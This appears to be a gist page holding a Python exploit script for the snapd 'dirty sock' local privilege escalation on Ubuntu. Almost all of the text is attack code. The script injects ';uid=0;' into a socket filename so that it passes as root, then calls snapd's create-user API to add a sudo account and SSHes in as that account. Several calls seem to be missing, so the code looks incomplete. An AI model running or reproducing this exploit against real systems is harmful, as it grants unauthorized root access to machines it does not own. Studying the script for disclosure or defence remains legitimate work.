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Created February 14, 2019 21:20
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Tests SnapD Escalation bug
#!/usr/bin/env python3
Local privilege escalation via snapd, affecting Ubuntu and others.
Discovered by Chris Moberly.
Before running, you need to:
- Create an Ubuntu developer account (
- Login to that account and ensure you have your public SSH key configured
in your profile.
Run exploit like this: -u <account email> -k <ssh priv key file>
Note that the exploit will create a new user account on the system with sudo
privileges and will also import your public key from your online Ubuntu
account. You may want to clean these up after use.
import argparse
import string
import random
import socket
import re
import sys
import os
def process_args():
"""Handles user-passed parameters"""
parser = argparse.ArgumentParser()
parser.add_argument('--username', '-u', type=str, action='store',
required=True, help='Your Ubuntu One account email.')
parser.add_argument('--key', '-k', type=str, action='store',
required=True, help='Full path to the same SSH public'
' key used in your Ubuntu One account.')
args = parser.parse_args()
if not os.path.isfile(args.key):
print("[!] That key file does not exist. Please try again.")
return args
def create_sockfile():
"""Generates a random socket file name to use"""
alphabet = string.ascii_lowercase
random_string = ''.join(random.choice(alphabet) for i in range(10))
dirty_sock = ';uid=0;'
# This is where we slip on the dirty sock. This makes its way into the
# UNIX AF_SOCKET's peer data, which is parsed in an insecure fashion
# by snapd's ucrednet.go file, allowing us to overwrite the UID variable.
sockfile = '/tmp/' + random_string + dirty_sock
print("[+] Slipped dirty sock on random socket file: " + sockfile)
return sockfile
def exploit_me(args, sockfile):
"""Main exploit function"""
post_payload = ('{"email": "' + args.username +
'", "sudoer": true, "force-managed": true}')
http_req = ('POST /v2/create-user HTTP/1.1\r\n'
'Host: localhost\r\n'
'Content-Length: ' + str(len(post_payload)) + '\r\n\r\n'
+ post_payload)
# This exploit only works if we also BIND to the socket after creating
# it, as we need to inject the dirty sock as a remote peer in the
# socket's ancillary data.
print("[+] Binding to socket file...")
client_sock = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM)
# Connect to the snap daemon
print("[+] Connecting to snapd API...")
# Send our payload to the snap API
print("[+] Sending payload...")
# Receive the data and extract the JSON
http_reply = client_sock.recv(8192).decode("utf-8")
# Try to extract a username from the valid reply
regex = re.compile(r'"status":"OK","result":{"username":"(.*?)"')
username = re.findall(regex, http_reply)
# If exploit was not successful, give details and exit
if 'cannot find user' in http_reply:
print("[!] Could not find user in the snap store... did you follow"
" the instructions?")
print("Here is the API reply:")
if not username:
print("[!] Something went wrong... Here is the API reply:")
# SSH into localhost with our new root account
print("[+] Success! Enjoy your new account with sudo rights!")
cmd1 = 'chmod 600 ' + args.key
cmd2 = 'ssh ' + username[0] + '@localhost -i ' + args.key
print("[+] Hope you enjoyed your stay!")
def main():
"""Main program function"""
args = process_args()
sockfile = create_sockfile()
exploit_me(args, sockfile)
if __name__ == '__main__':
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